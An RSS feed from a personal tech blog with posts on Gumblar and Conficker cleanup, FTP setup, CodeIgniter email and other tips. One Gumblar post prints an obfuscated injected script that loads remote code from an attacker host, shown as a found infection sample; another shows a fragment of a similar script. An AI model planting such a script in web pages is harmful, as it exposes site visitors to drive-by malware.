<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>envio land</title>
	
	<link>http://a3-system.info/blog</link>
	<description>Ash Like Snow</description>
	<lastBuildDate>Fri, 27 Aug 2010 14:47:48 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/EnvioLand" /><feedburner:info uri="envioland" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>YET Another Gumblar</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/sCT1StM6Ccs/</link>
		<comments>http://a3-system.info/blog/php/yet-another-gumblar/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 14:47:48 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[Gumblar virus]]></category>
		<category><![CDATA[removal]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=296</guid>
		<description><![CDATA[Today I have deal with my client to clean all chaos caused by Gumblar virus, It&#8217;s seem his root password was stolen and all web data infected with code. The virus code snippet is like this:
var D;if(D!='' &#38;&#38; D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();

The condition , all index file , index.html or index.php was [...]]]></description>
			<content:encoded><![CDATA[<p>Today I have deal with my client to clean all chaos caused by Gumblar virus, It&#8217;s seem his root password was stolen and all web data infected with code. The virus code snippet is like this:</p>
<pre name="code" class="js">var D;if(D!='' &amp;&amp; D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();
</pre>
<p>The condition , all index file , index.html or index.php was injected. The virus code injected on last line of file. After couple hour browse I didn&#8217;t find any solution to this problem and this make me confused, it will horrible if I have to remove the virus code one by one. </p>
<p>After two hour doing experiment finally I found the way how to remove the virus, just use bash script , using &#8220;grep&#8221; , &#8220;find&#8221; , &#8220;cut&#8221; , &#8220;grep&#8221; , &#8220;xargs&#8221; and &#8220;sed&#8221;. <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/php/yet-another-gumblar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/php/yet-another-gumblar/</feedburner:origLink></item>
		<item>
		<title>Pure-FTPD with MySQL support for HTTPD purpose on CentOS 5.5</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/ovZP1JXFzBU/</link>
		<comments>http://a3-system.info/blog/apache/pure-ftpd-with-mysql-support-for-httpd-purpose-on-centos-5-5/#comments</comments>
		<pubDate>Fri, 20 Aug 2010 03:28:21 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[apache]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[Authentication failed for user]]></category>
		<category><![CDATA[Centos]]></category>
		<category><![CDATA[httpd]]></category>
		<category><![CDATA[pure-ftpd]]></category>
		<category><![CDATA[[WARNING] Can't login as []: account disabled]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=293</guid>
		<description><![CDATA[Recently I want to setup a FTP system which can used to access HTTPD file, the FTP user will can add / modify or delete file or directory on /var/www/html which it is the httpd document root. 
I just follow the instruction from howtoforge for Pure-FTPD with mysql support. Recently I realize that tutorial dedicated [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I want to setup a FTP system which can used to access HTTPD file, the FTP user will can add / modify or delete file or directory on /var/www/html which it is the httpd document root. </p>
<p>I just follow the instruction from <a href="http://www.howtoforge.com/virtual-hosting-with-pureftpd-and-mysql-incl-quota-and-bandwidth-management-on-centos-5.3">howtoforge for Pure-FTPD with mysql support</a>. Recently I realize that tutorial dedicated to buid a FTP with no have relation with httpd.</p>
<p>When I try to login to my ftp it can login well but the user will be &#8220;read-only&#8221; because the FTP home folder owner is apache user. For example my FTP user cacti with home user /var/www/html/cacti.</p>
<p>To accommodate my needs I need to adjust some parameter on pure-ftpd config ( /etc/pure-ftpd/pure-ftpd.conf ) , find &#8220;MinUID&#8221; string and set it to apache UID / for example on my server apache UID is 48 , now set MinUID to 48. Restart your Pure-FTPD server and test it ^^</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/apache/pure-ftpd-with-mysql-support-for-httpd-purpose-on-centos-5-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/apache/pure-ftpd-with-mysql-support-for-httpd-purpose-on-centos-5-5/</feedburner:origLink></item>
		<item>
		<title>Just Found PNG CSS background fixer</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/xR8njCS9Jac/</link>
		<comments>http://a3-system.info/blog/fun-stuff/just-found-png-css-background-fixer/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 03:52:37 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[fun stuff]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[CSS background]]></category>
		<category><![CDATA[PNG fix]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=291</guid>
		<description><![CDATA[I just found a jQuery plugin for CSS background, recently I use another jQuery plugin to fix PNG image, it&#8217;s only work from  tag but didn&#8217;t work on CSS background. Check out the plugin here :
http://jquery.andreaseberhard.de/pngFix/
For example , I have use it on http://fk.uns.ac.id
Cheers !!
]]></description>
			<content:encoded><![CDATA[<p>I just found a jQuery plugin for CSS background, recently I use another jQuery plugin to fix PNG image, it&#8217;s only work from <img > tag but didn&#8217;t work on CSS background. Check out the plugin here :</p>
<p>http://jquery.andreaseberhard.de/pngFix/</p>
<p>For example , I have use it on http://fk.uns.ac.id</p>
<p>Cheers !!</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/fun-stuff/just-found-png-css-background-fixer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/fun-stuff/just-found-png-css-background-fixer/</feedburner:origLink></item>
		<item>
		<title>Send Email Using Codeigniter on Yahoo Small Business</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/HYUdvL0i7cQ/</link>
		<comments>http://a3-system.info/blog/php/send-email-using-codeigniter-on-yahoo-small-business/#comments</comments>
		<pubDate>Sat, 31 Jul 2010 02:13:55 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[code igniter]]></category>
		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=280</guid>
		<description><![CDATA[I just successfully using Codeigniter email library to send an email on Yahoo small business,  It&#8217;s not to difficult to do that, here my step.

Login To your Yahoo small business, http://smallbusiness.yahoo.com/
Click &#8220;Access Your Account&#8221; on top bar, then &#8220;small business&#8221;
Click &#8220;Web Hosting Controll Panel&#8221;
Click &#8220;Create &#38; Update&#8221; tab
Click &#8220;Other Site Building Tools&#8221;
Click &#8220;PHP/Perl Mail&#8221;
On right [...]]]></description>
			<content:encoded><![CDATA[<p>I just successfully using Codeigniter email library to send an email on Yahoo small business,  It&#8217;s not to difficult to do that, here my step.</p>
<ol>
<li>Login To your Yahoo small business, http://smallbusiness.yahoo.com/</li>
<li>Click &#8220;Access Your Account&#8221; on top bar, then &#8220;small business&#8221;</li>
<li>Click &#8220;Web Hosting Controll Panel&#8221;</li>
<li>Click &#8220;Create &amp; Update&#8221; tab</li>
<li>Click &#8220;Other Site Building Tools&#8221;</li>
<li>Click &#8220;PHP/Perl Mail&#8221;</li>
<li>On right side, you must set email sender to use on &#8220;From&#8221; field, for example I use <strong>webmaster</strong></li>
<li>Click &#8220;Save Default&#8221; to set it</li>
</ol>
<p>Now at CodeIgniter controller we must use email address that have been already set on &#8216;from&#8217; field, for example I have already set &#8220;webmaster@mydomain.com&#8221; so here the code example:</p>
<pre name="code" class="php">
## send email to some one
$this-&gt;load-&gt;library('email');
$config['protocol']     = 'sendmail';
$config['mailpath']     = '/usr/sbin/sendmail -t';
$config['wordwrap']     = TRUE;
$config['useragent']    = 'CI Mailer';
$config['mailtype']     = 'text';
$config['newline']      = "\r\n";

## email contact
$this-&gt;email-&gt;initialize($config);
$this-&gt;email-&gt;from('webmaster@mydomain.com');
$this-&gt;email-&gt;to('recipient@domain.com');
$this-&gt;email-&gt;subject('Web Visitor");
$message  = "Test Email";

$this-&gt;email-&gt;message($message);
$this-&gt;email-&gt;send();
#echo $this-&gt;email-&gt;print_debugger();
</pre>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/php/send-email-using-codeigniter-on-yahoo-small-business/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/php/send-email-using-codeigniter-on-yahoo-small-business/</feedburner:origLink></item>
		<item>
		<title>Silly SmartDav Autorun.inf Folder</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/Ft2AoySAovM/</link>
		<comments>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 03:16:18 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=277</guid>
		<description><![CDATA[When I plug my USB pen drive to my friend computer that SmartDav antivirus installed there, it will automatically create a autorun.inf folder and make some special directory there called &#8220;con&#8221; and on that directory it also create another directory called &#8220;Locked by SmartDav &#8230; bla &#8230; bla &#8230; bla&#8221;
The annoying  problem when I plug [...]]]></description>
			<content:encoded><![CDATA[<p>When I plug my USB pen drive to my friend computer that SmartDav antivirus installed there, it will automatically create a autorun.inf folder and make some special directory there called &#8220;con&#8221; and on that directory it also create another directory called &#8220;Locked by SmartDav &#8230; bla &#8230; bla &#8230; bla&#8221;</p>
<p>The annoying  problem when I plug my USB pen drive to my own computer with Avira antivirus installed, the Avira Active Guard seem scan the &#8220;autorun.inf&#8221; folder then Lock It.</p>
<p>When I want to eject my USB pen drive it can&#8217;t be done, It said my USB pen drive being used <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> .  I think the the &#8220;special&#8221; folder created by SmartDav must be removed.</p>
<p>The special folder created by SmartDav can not delete using normal way, it will say &#8220;Can not find specific File&#8221; or &#8220;Invalid Parameter&#8221;.  After googling I found some trick how to remove it. Here the trick :</p>
<p>1. Open Command Promt</p>
<p>2. J:\&gt;rd /S \\.\j:\autorun\con\</p>
<p>&#8220;J&#8221;  is my USB pen drive and It will ask confirmation, hit &#8220;Y&#8221; to confirm then The autorun.inf folder and it sub folder will automatically deleted <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/</feedburner:origLink></item>
		<item>
		<title>Repeat as Header on MS Word not working</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/tr37rMBqLSo/</link>
		<comments>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/#comments</comments>
		<pubDate>Mon, 24 May 2010 02:31:36 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[fun stuff]]></category>
		<category><![CDATA[life]]></category>
		<category><![CDATA[Repeat as Header on MS Word not working]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=273</guid>
		<description><![CDATA[Some time when you format some row as table header it didn&#8217;t work correctly, the solution is very easy,
1. select all your table , and right click, it will show table properties, click it !
2. then it will show table properties, click &#8220;table&#8221; tab on top of it.
3. change &#8220;text wrapping&#8221;  in to &#8220;none&#8221;
4. that&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Some time when you format some row as table header it didn&#8217;t work correctly, the solution is very easy,</p>
<p>1. select all your table , and right click, it will show table properties, click it !</p>
<p>2. then it will show table properties, click &#8220;table&#8221; tab on top of it.</p>
<p>3. change &#8220;text wrapping&#8221;  in to &#8220;none&#8221;</p>
<p>4. that&#8217;s it, you can select some row as your table header <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/</feedburner:origLink></item>
		<item>
		<title>Conficker Removal</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/qWAyTYZH4Vc/</link>
		<comments>http://a3-system.info/blog/daily-life/conficker-removal/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 03:55:50 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Conficker Protect]]></category>
		<category><![CDATA[Conficker Protection]]></category>
		<category><![CDATA[Conficker Removal]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=270</guid>
		<description><![CDATA[Last day I have successfully remove all conficker on from serveral Windows XP  computer. Those conficker must be the latest one because the computer has internet computer so it will update it self.
Method that I use is :
1. Unplug / terminate the local area connection.
2. Use rootkit detector to disable some svchost service infected by [...]]]></description>
			<content:encoded><![CDATA[<p>Last day I have successfully remove all conficker on from serveral Windows XP  computer. Those conficker must be the latest one because the computer has internet computer so it will update it self.</p>
<p>Method that I use is :</p>
<p>1. Unplug / terminate the local area connection.</p>
<p>2. Use rootkit detector to disable some svchost service infected by conficker</p>
<p>You can download the rootkit detector at <a href="http://www.gmer.net/.">http://www.gmer.net/</a> Run the rootkit detector software, if your computer has conficker on it it will detect some svchost service in red colour. You not need do full scan, just right click on red svchost service found by the rootkitdetector, and click <strong>disable service</strong>.</p>
<p>3. Use conficker removal software</p>
<p>Use this removal software from <a href="http://www.enigmasoftware.com/products/conficker-removal-tool/">http://www.enigmasoftware.com/products/conficker-removal-tool/</a> it very small tool, less than 200Kb software. Download and run the software. Follow the instruction. It need reboot few time.</p>
<p>4. Patch Your Windows with latest hotfix from microsoft to avoid conficker come again. Get the patch on</p>
<p><a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx</a> . Download accourding you operating system.</p>
<p>That&#8217;s it</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/conficker-removal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/daily-life/conficker-removal/</feedburner:origLink></item>
		<item>
		<title>Video Instruction for 7D user</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/RwgdydNLIFc/</link>
		<comments>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 01:42:06 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[canon 7D video instruction]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=268</guid>
		<description><![CDATA[For Canon 7D user, canon has been released some video instruction. Check the video at :
http://www.usa.canon.com/dlc/controller?act=GetArticleAct&#38;articleID=3167
]]></description>
			<content:encoded><![CDATA[<p>For Canon 7D user, canon has been released some video instruction. Check the video at :</p>
<p><a href="http://www.usa.canon.com/dlc/controller?act=GetArticleAct&amp;articleID=3167">http://www.usa.canon.com/dlc/controller?act=GetArticleAct&amp;articleID=3167</a></p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/</feedburner:origLink></item>
		<item>
		<title>303E Deep Striker paper craft finally come !!!!</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/nD-FKuDUnhw/</link>
		<comments>http://a3-system.info/blog/fun-stuff/303e-deep-skriker-paper-craft-finally-come/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 07:58:41 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[fun stuff]]></category>
		<category><![CDATA[303E Deep Skriker paper craft]]></category>
		<category><![CDATA[303E Deep Skriker papermodel]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=264</guid>
		<description><![CDATA[Today, I just browse for my favorite paper craft, 303E Deep striker, I know it has commercial release, but I hope some day some one want to share it  
Finally today I found some one has post it and I am very very very happy ^.^
Grab it on
http://gunime.blogspot.com/2010/02/gff0013-plan-303e-deep-striker.html
]]></description>
			<content:encoded><![CDATA[<p>Today, I just browse for my favorite paper craft, 303E Deep striker, I know it has commercial release, but I hope some day some one want to share it <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Finally today I found some one has post it and I am very very very happy ^.^</p>
<p>Grab it on</p>
<p>http://gunime.blogspot.com/2010/02/gff0013-plan-303e-deep-striker.html</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/fun-stuff/303e-deep-skriker-paper-craft-finally-come/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/fun-stuff/303e-deep-skriker-paper-craft-finally-come/</feedburner:origLink></item>
		<item>
		<title>/*LGPL* virus again (Gumblar Family)</title>
		<link>http://feedproxy.google.com/~r/EnvioLand/~3/EbM0tl-4Gz0/</link>
		<comments>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/#comments</comments>
		<pubDate>Mon, 25 Jan 2010 00:34:41 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Gumblar virus]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=250</guid>
		<description><![CDATA[After last virus attack , some my FTP account was stolen, my terrible mistake, I forgot change some of FTP password and the second attack come again after I clean it with virus removal from justcoded.com.
The second attact, the Java script code injected is not same as first one, it have some code variant , [...]]]></description>
			<content:encoded><![CDATA[<p>After last virus attack , some my FTP account was stolen, my terrible mistake, I forgot change some of FTP password and the second attack come again after I clean it with virus removal from justcoded.com.</p>
<p>The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :</p>
<pre class="javascript">
&lt;script&gt;/*Exception*/ document.write('&lt;script src='+'h!&amp;&amp;t^^t#p&amp;(#^:$&amp;^^/&amp;@)/&amp;@@i!!$m@)a^#@g$!e($$)f@^a@&amp;p$&amp;$(-#c!o@!&amp;m^.&amp;h!!!a)t!$!e#n$#a!.!!&amp;&amp;n@e@!).$^$#j^@#^p@^(@.&amp;!&amp;s(!l#i@&amp;d#!e)$s@#h&amp;^a!!r!^e^-@$#n!(@e((t$&amp;#(.)s(u^(p@^!e!)r!)@)t!@&amp;r##u($^e^)l$#)i&amp;!&amp;f&amp;@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&amp;^)l&amp;e#&amp;(q(@^u#)!i!)p@(!e&amp;&amp;&amp;^.#!(f#!r)$!/^)l)&amp;@@e)#q^$@u@!!i#^(p$(e!^&amp;.#!f!r$&amp;/@v((k^@.(@c$@&amp;$o^!@m($/&amp;$g&amp;(@)o)!o(@&amp;!g$)!l!$e$$.)!c@$))o#@$^&amp;m@&amp;&amp;^/!p(&amp;c&amp;&amp;&amp;p#!)o#@#p@(.&amp;c#@!o$m$$&amp;/&amp;#!('.replace(/\)|@|\!|#|&amp;|\^|\(|\$/ig, '')+' defer=defer&gt;&lt;/scr'+'ipt&gt;');&lt;/script&gt;
&lt;!--2a2a37017f4e478abaa5f3c16a9b2656--&gt;
</pre>
<p>So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it <a href="http://justcoded.com/article/gumblar-family-virus-removal-tool/" target="_blank">here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/</feedburner:origLink></item>
	</channel>
</rss>
